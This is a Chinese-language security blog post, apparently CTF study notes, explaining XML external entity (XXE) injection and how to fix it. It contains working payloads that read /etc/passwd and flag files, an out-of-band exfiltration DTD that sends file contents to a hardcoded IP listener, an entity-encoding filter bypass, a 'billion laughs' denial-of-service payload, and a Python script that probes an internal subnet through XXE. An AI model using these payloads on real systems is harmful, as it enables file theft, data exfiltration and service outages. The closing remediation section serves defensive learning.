

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/III.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Zer0">
  <meta name="keywords" content="">
  
    <meta name="description" content="XXE外部实体漏洞XML和DTDXML与HTML的区别XML是被设计为传输和存储数据，其焦点是数据的内容 HTML被设计用来显示数据，其焦点是数据的外观 HTML主要是显示信息，而XML主要传输信息 所以，如果不严谨的话，就会造成XML去传输一些恶意的信息 漏洞成因XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内">
<meta property="og:type" content="article">
<meta property="og:title" content="XXE外部注入实体漏洞_php">
<meta property="og:url" content="https://eznp.github.io/2024/07/10/XXE%E5%A4%96%E9%83%A8%E6%B3%A8%E5%85%A5%E5%AE%9E%E4%BD%93%E6%BC%8F%E6%B4%9E-php/index.html">
<meta property="og:site_name" content="Zer0">
<meta property="og:description" content="XXE外部实体漏洞XML和DTDXML与HTML的区别XML是被设计为传输和存储数据，其焦点是数据的内容 HTML被设计用来显示数据，其焦点是数据的外观 HTML主要是显示信息，而XML主要传输信息 所以，如果不严谨的话，就会造成XML去传输一些恶意的信息 漏洞成因XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202407091426966.png">
<meta property="og:image" content="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202407091658763.png">
<meta property="article:published_time" content="2024-07-10T10:13:51.000Z">
<meta property="article:modified_time" content="2024-07-12T09:05:00.829Z">
<meta property="article:author" content="Zer0">
<meta property="article:tag" content="-xxe">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202407091426966.png">
  
  
  
  <title>XXE外部注入实体漏洞_php - Zer0</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"eznp.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.2.0"><link rel="alternate" href="/atom.xml" title="Zer0" type="application/atom+xml">
</head>


<body><!-- hexo injector body_begin start --><div id="web_bg"></div><!-- hexo injector body_begin end -->
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Zer0</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/P.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="XXE外部注入实体漏洞_php"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-07-10 18:13" pubdate>
          2024年7月10日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.9k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          16 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">XXE外部注入实体漏洞_php</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="XXE外部实体漏洞"><a href="#XXE外部实体漏洞" class="headerlink" title="XXE外部实体漏洞"></a>XXE外部实体漏洞</h1><h2 id="XML和DTD"><a href="#XML和DTD" class="headerlink" title="XML和DTD"></a>XML和DTD</h2><h3 id="XML与HTML的区别"><a href="#XML与HTML的区别" class="headerlink" title="XML与HTML的区别"></a>XML与HTML的区别</h3><p>XML是被设计为传输和存储数据，其焦点是数据的内容</p>
<p>HTML被设计用来显示数据，其焦点是数据的外观</p>
<p>HTML主要是显示信息，而XML主要传输信息</p>
<p>所以，如果不严谨的话，就会造成XML去传输一些恶意的信息</p>
<h3 id="漏洞成因"><a href="#漏洞成因" class="headerlink" title="漏洞成因"></a>漏洞成因</h3><p>XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置（就是有上传xml文件的入口点），没有对上传的xml文件进行过滤，导致可上传恶意xml文件。</p>
<h3 id="XML的格式"><a href="#XML的格式" class="headerlink" title="XML的格式"></a>XML的格式</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs dtd">&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt; //声明XML文档<br><br>&lt;!DOCTYPE note [<br>  &lt;!ELEMENT note (to,from,heading,body)&gt;<br>  &lt;!ELEMENT to      (#PCDATA)&gt;				<br>  &lt;!ELEMENT from    (#PCDATA)&gt;				//DTD文档定义类型<br>  &lt;!ELEMENT heading (#PCDATA)&gt;<br>  &lt;!ELEMENT body    (#PCDATA)&gt;<br>]&gt;<br><br>&lt;note&gt;<br>&lt;to&gt;George&lt;/to&gt;<br>&lt;from&gt;John&lt;/from&gt;							//文档元素，元素是自由设定的。<br>&lt;heading&gt;Reminder&lt;/heading&gt; 				//但是一定要有根元素和分支，并且正确嵌套<br>&lt;body&gt;Don&#x27;t forget the meeting!&lt;/body&gt;<br>&lt;/note&gt;<br><br></code></pre></td></tr></table></figure>

<h3 id="DTD（文档定义类型）-实体"><a href="#DTD（文档定义类型）-实体" class="headerlink" title="DTD（文档定义类型）-实体"></a>DTD（文档定义类型）-实体</h3><p><strong>实体是用于定义引用普通文本或特殊字符的快捷方式的变量。</strong></p>
<p><strong>实体引用是对实体的引用。</strong></p>
<p><strong>实体可在内部或外部进行声明。</strong></p>
<h5 id="作用是定义XML文档的合法构建模块，可内部声明，也可外部引用，这个也是外部实体注入的关键地方"><a href="#作用是定义XML文档的合法构建模块，可内部声明，也可外部引用，这个也是外部实体注入的关键地方" class="headerlink" title="作用是定义XML文档的合法构建模块，可内部声明，也可外部引用，这个也是外部实体注入的关键地方"></a>作用是定义XML文档的合法构建模块，可内部声明，也可外部引用，这个也是外部实体注入的关键地方</h5><h4 id="内部实体的声明"><a href="#内部实体的声明" class="headerlink" title="内部实体的声明"></a>内部实体的声明</h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs dtd">语法：<br>&lt;!ENTITY 实体名称 &quot;实体的值&quot;&gt;<br><br>DTD中：<br>例子：<br>&lt;!ENTITY writer &quot;Bill Gates&quot;&gt;<br>&lt;!ENTITY copyright &quot;Copyright W3School.com.cn&quot;&gt;<br><br>XML中：<br>一个实体由三部分构成: 一个和号 (&amp;), 一个实体名称, 以及一个分号 (;)。<br>例子;<br>&lt;author&gt;&amp;writer;&amp;copyright;&lt;/author&gt;<br></code></pre></td></tr></table></figure>

<h4 id="外部实体声明"><a href="#外部实体声明" class="headerlink" title="外部实体声明"></a>外部实体声明</h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs dtd">语法:<br>&lt;!ENTITY 实体名称 SYSTEM &quot;URI/URL&quot;&gt;<br><br>DTD中：<br>例子：<br>&lt;!ENTITY writer SYSTEM &quot;http://www.baidu.com.cn/dtd/entities.dtd&quot;&gt;<br>&lt;!ENTITY copyright SYSTEM &quot;http://www.w3school.com.cn/dtd/entities.dtd&quot;&gt;<br><br>XML中：<br>例子：<br>&lt;author&gt;&amp;writer;&amp;copyright;&lt;/author&gt;<br><br>或者<br>&lt;!ENTITY 实体名称 PUBLIC &quot;public_ID&quot; &quot;URI&quot;&gt;<br></code></pre></td></tr></table></figure>

<h3 id="XML外部实体注入"><a href="#XML外部实体注入" class="headerlink" title="XML外部实体注入"></a>XML外部实体注入</h3><p>当允许引用外部实体时，由于XML注重于数据的传输，所以通过构造恶意内容，可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。</p>
<h4 id="方式1"><a href="#方式1" class="headerlink" title="方式1:"></a>方式1:</h4><h4 id="通过协议来引用，不过不同的程序支持的协议不一样"><a href="#通过协议来引用，不过不同的程序支持的协议不一样" class="headerlink" title="通过协议来引用，不过不同的程序支持的协议不一样"></a>通过协议来引用，不过不同的程序支持的协议不一样</h4><h4 id=""><a href="#" class="headerlink" title=""></a><img src="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202407091426966.png" srcset="/img/loading.gif" lazyload alt="img"></h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs xml-dtd">&lt;?xml version=&quot;1.0&quot;?&gt;<br>&lt;!DOCTYPE test[<br>    &lt;!ENTITY Y SYSTEM &quot;file:///etc/passwd&quot;&gt;<br>    ]&gt;<br>&lt;user&gt;&amp;Y&lt;/user&gt;<br>//上传该文件就会返回/etc/passwd的内容<br></code></pre></td></tr></table></figure>

<h4 id="方式2："><a href="#方式2：" class="headerlink" title="方式2："></a>方式2：</h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs xml-dtd">&lt;?xml version=&quot;1.0&quot;?&gt;<br>&lt;!DOCTYPE test[<br>    &lt;!ENTITY Y SYSTEM &quot;http://www.baidu.com&quot;&gt;<br>    ]&gt;<br>&lt;user&gt;&amp;Y&lt;/user&gt;<br></code></pre></td></tr></table></figure>

<h4 id="方式3（数据外带—在xxe的盲注中可以使用）："><a href="#方式3（数据外带—在xxe的盲注中可以使用）：" class="headerlink" title="方式3（数据外带—在xxe的盲注中可以使用）："></a>方式3（数据外带—在xxe的盲注中可以使用）：</h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs xml-dtd">&lt;!DOCTYPE root [   <br>&lt;!ENTITY % remote SYSTEM &quot;http://174.1.66.167/shell.dtd&quot;&gt;  <br>%remote;  <br>]&gt;  <br>  <br>shell.dtd  <br>&lt;!ENTITY % file SYSTEM &quot;file:///flag&quot;&gt;  <br>&lt;!ENTITY % int &quot;&lt;!ENTITY &amp;#37; send SYSTEM &#x27;http://127.0.0.1:5555/?flag=%file;&#x27;&gt;&quot;&gt;  <br>%int;  <br>%send;<br></code></pre></td></tr></table></figure>

<p><img src="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202407091658763.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h4 id="方式4（内部DTD-参数外部实体）："><a href="#方式4（内部DTD-参数外部实体）：" class="headerlink" title="方式4（内部DTD+参数外部实体）："></a>方式4（内部DTD+参数外部实体）：</h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs xml-dtd">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;<br>&lt;!DOCTYPE a[<br>&lt;!ENTITY %name SYSTEM &quot;file:///etc/passwd&quot;&gt;<br>%name;<br>]&gt;<br>//注意：%name（参数实体）是在 DTD 中被引用的，而&amp;name（其余实体）实在 xml 文档中被引用<br>的。<br></code></pre></td></tr></table></figure>

<h4 id="绕过手法"><a href="#绕过手法" class="headerlink" title="绕过手法"></a>绕过手法</h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs xml-dtd">双重实体编码绕过<br>&lt;?xml version=&quot;1.0&quot;?&gt;  <br>  <br>&lt;!DOCTYPE GVI [  <br>  <br>    &lt;!ENTITY % xml &quot;&amp;#60;&amp;#33;&amp;#69;&amp;#78;&amp;#84;&amp;#73;&amp;#84;&amp;#89;&amp;#32;&amp;#120;&amp;#120;&amp;#101;&amp;#32;&amp;#83;&amp;#89;&amp;#83;&amp;#84;&amp;#69;&amp;#77;&amp;#32;&amp;#34;&amp;#102;&amp;#105;&amp;#108;&amp;#101;&amp;#58;&amp;#47;&amp;#47;&amp;#47;&amp;#102;&amp;#108;&amp;#97;&amp;#103;&amp;#46;&amp;#116;&amp;#120;&amp;#116;&amp;#34;&amp;#32;&amp;#62;&amp;#93;&amp;#62;&amp;#10;&amp;#60;&amp;#99;&amp;#111;&amp;#114;&amp;#101;&amp;#62;&amp;#10;&amp;#32;&amp;#32;&amp;#32;&amp;#32;&amp;#32;&amp;#32;&amp;#60;&amp;#109;&amp;#101;&amp;#115;&amp;#115;&amp;#97;&amp;#103;&amp;#101;&amp;#62;&amp;#38;&amp;#120;&amp;#120;&amp;#101;&amp;#59;&amp;#60;&amp;#47;&amp;#109;&amp;#101;&amp;#115;&amp;#115;&amp;#97;&amp;#103;&amp;#101;&amp;#62;&amp;#10;&amp;#60;&amp;#47;&amp;#99;&amp;#111;&amp;#114;&amp;#101;&amp;#62;&quot;&gt;  <br>  <br>    %xml;<br><br>编码内容:<br>&lt;!ENTITY xxe SYSTEM &quot;file:///flag.txt&quot; &gt;]&gt;  <br>&lt;core&gt;  <br>      &lt;message&gt;&amp;xxe;&lt;/message&gt;  <br>&lt;/core&gt;<br></code></pre></td></tr></table></figure>

<h4 id="拒绝服务攻击代码"><a href="#拒绝服务攻击代码" class="headerlink" title="拒绝服务攻击代码"></a>拒绝服务攻击代码</h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs xml-dtd">&lt;?xml version=&quot;1.0&quot;?&gt;<br>&lt;!DOCTYPE lolz [ <br>&lt;!ENTITY lol &quot;lol&quot;&gt; <br>&lt;!ENTITY lol2 &quot;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&quot;&gt; <br>&lt;!ENTITY lol3 &quot;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&quot;&gt; &lt;!ENTITY lol4 &quot;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&quot;&gt; &lt;!ENTITY lol5 &quot;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&quot;&gt; &lt;!ENTITY lol6 &quot;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&quot;&gt; &lt;!ENTITY lol7 &quot;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&quot;&gt; &lt;!ENTITY lol8 &quot;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&quot;&gt; &lt;!ENTITY lol9 &quot;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&quot;&gt;<br>]&gt; <br>&lt;lolz&gt;&amp;lol9;&lt;/lolz&gt;<br>&lt;--XML解析器尝试解析该文件时，由于DTD的定义指数级展开（即递归引用),举个例子，这里定义了一个lol的实体，实体还有“lol”的字符串，然后定义了一个lol2的实体，里面有10个&quot;lol&quot;的字符串，依次递推，一个lol3实体引用10个lol2实体，这样的话可以一直向服务器传输文件，也就是形成了DOS攻击，经过XML解析器解析后的内存占用会比其本身大的多。--&gt;<br></code></pre></td></tr></table></figure>

<h3 id="内网扫描"><a href="#内网扫描" class="headerlink" title="内网扫描"></a>内网扫描</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs xml-dtd">&lt;?xml version=&quot;1.0&quot; ?&gt;<br>&lt;!DOCTYPE xxe[<br>&lt;!ENTITY xxe SYSTEM &quot;file://proc/net/fib_trie&quot;&gt;<br>&lt;user&gt;&amp;xxe&lt;/user&gt;<br>]&gt;<br>file:///etc/hosts 储存域名解析的缓存<br><br>file:///proc/net/arp arp表，可以获得内网其他机器的地址<br><br>file:///proc/net/tcp<br><br>file:///proc/net/udp<br><br>file:///proc/net/dev<br><br>file:///proc/net/fib_trie 路由缓存<br><br>file:///etc/passwd 用户密码<br><br></code></pre></td></tr></table></figure>

<h3 id="内网扫描脚本（借用大佬的脚本）"><a href="#内网扫描脚本（借用大佬的脚本）" class="headerlink" title="内网扫描脚本（借用大佬的脚本）"></a>内网扫描脚本（借用<a target="_blank" rel="noopener" href="https://www.cnblogs.com/Article-kelp/p/16026652.html">大佬的脚本</a>）</h3><figure class="highlight python"><table><tr><td class="code"><pre><code class="hljs python"><br><span class="hljs-keyword">import</span> requests <span class="hljs-keyword">as</span> res<br>url=<span class="hljs-string">&quot;http://185729a2-949c-44fb-ac39-c16282525e73.node5.buuoj.cn:81/doLogin.php&quot;</span><br>rawPayload=<span class="hljs-string">&#x27;&lt;?xml version=&quot;1.0&quot;?&gt;&#x27;</span>\<br>         <span class="hljs-string">&#x27;&lt;!DOCTYPE note [&#x27;</span>\<br>         <span class="hljs-string">&#x27;&lt;!ENTITY payload SYSTEM &quot;http://10.244.80.&#123;&#125;&quot;&gt;&#x27;</span>\<br>         <span class="hljs-string">&#x27;]&gt;&#x27;</span>\<br>         <span class="hljs-string">&#x27;&lt;user&gt;&#x27;</span>\<br>         <span class="hljs-string">&#x27;&lt;username&gt;&#x27;</span>\<br>         <span class="hljs-string">&#x27;&amp;payload;&#x27;</span>\<br>         <span class="hljs-string">&#x27;&lt;/username&gt;&#x27;</span>\<br>         <span class="hljs-string">&#x27;&lt;password&gt;&#x27;</span>\<br>         <span class="hljs-string">&#x27;123&#x27;</span>\<br>         <span class="hljs-string">&#x27;&lt;/password&gt;&#x27;</span>\<br>         <span class="hljs-string">&#x27;&lt;/user&gt;&#x27;</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1</span>,<span class="hljs-number">256</span>):<br>    payload=rawPayload.<span class="hljs-built_in">format</span>(i)<br>    <span class="hljs-comment">#payload=rawPayload</span><br>    <span class="hljs-built_in">print</span>(<span class="hljs-built_in">str</span>(<span class="hljs-string">&quot;#&#123;&#125; =&gt;&quot;</span>).<span class="hljs-built_in">format</span>(i),end=<span class="hljs-string">&#x27;&#x27;</span>)<br>    <span class="hljs-keyword">try</span>:<br>        resp=res.post(url,data=payload,timeout=<span class="hljs-number">0.5</span>)<br>    <span class="hljs-keyword">except</span>:<br>        <span class="hljs-keyword">continue</span><br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-built_in">print</span>(resp.text,end=<span class="hljs-string">&#x27;&#x27;</span>)<br>    <span class="hljs-keyword">finally</span>:<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">&#x27;&#x27;</span>)<br></code></pre></td></tr></table></figure>

<h3 id="修复方案"><a href="#修复方案" class="headerlink" title="修复方案"></a>修复方案</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">xxe修复<br><br>方案：使用开发语言提供的禁用外部实体的方法<br><br>1.PHP：<br>libxml\_disable\_entity\_loader(true);//设置为true时禁止解析xml外部实体<br><br>2.JAVA:<br>DocumentBuilderFactory dbf=DocumentBuilderFactory.newInstance();<br>dbf.setExpandEntityReferences(false);<br><br>3.Python：<br>from lxml import etree<br>xmlData=etree.parse(xmlSource,etree.XMLParser(resolve\_entities=False))<br></code></pre></td></tr></table></figure>



<h2 id="参考文章："><a href="#参考文章：" class="headerlink" title="参考文章："></a>参考文章：</h2><p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/happystudyhuan/p/11774626.html">XXE漏洞-再简单一点点</a></p>
<p><a target="_blank" rel="noopener" href="https://security.tencent.com/index.php/blog/msg/69">未知攻焉知防——XXE漏洞攻防</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.51cto.com/u_13953961/3107472">XXE外部实体注入漏洞——PHP</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_26750831/article/details/115201337?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522172050770116800211510330%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=172050770116800211510330&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-6-115201337-null-null.142%5Ev100%5Epc_search_result_base2&utm_term=php%20xxe&spm=1018.2226.3001.4187">php xxe注入,XXE的原理利用方式及修复</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/logic1001/article/details/136590382?ops_request_misc=&request_id=&biz_id=102&utm_term=php%20xxe&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduweb~default-0-136590382.142%5Ev100%5Epc_search_result_base2&spm=1018.2226.3001.4187">渗透攻击零基础学习-XXE（非常详细）零基础入门到精通，收藏这一篇就够了！！！</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/Article-kelp/p/16026652.html">BUUCTF题解 NCTF2019 True XML cookbook–Article</a></p>
<p><a target="_blank" rel="noopener" href="https://peekaboo.show/untitled-7/">[NCTF2019]True XML cookbook 1-peekaboo</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_43221560/article/details/108152738">XXE漏洞-内网探测</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/xxe/" class="print-no-link">#-xxe</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>XXE外部注入实体漏洞_php</div>
      <div>https://eznp.github.io/2024/07/10/XXE外部注入实体漏洞-php/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Zer0</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年7月10日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/07/11/NewStarCTF-2023-%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-RCE-%E6%97%A0%E5%9B%9E%E6%98%BERCE/" title="[NewStarCTF 2023 公开赛道]RCE-无回显RCE">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">[NewStarCTF 2023 公开赛道]RCE-无回显RCE</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/07/10/NewStarCTF-2023-%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-Include-%F0%9F%8D%90-LFI-to-RCE/" title="[NewStarCTF 2023 公开赛道]Include 🍐--LFI to RCE">
                        <span class="hidden-mobile">[NewStarCTF 2023 公开赛道]Include 🍐--LFI to RCE</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
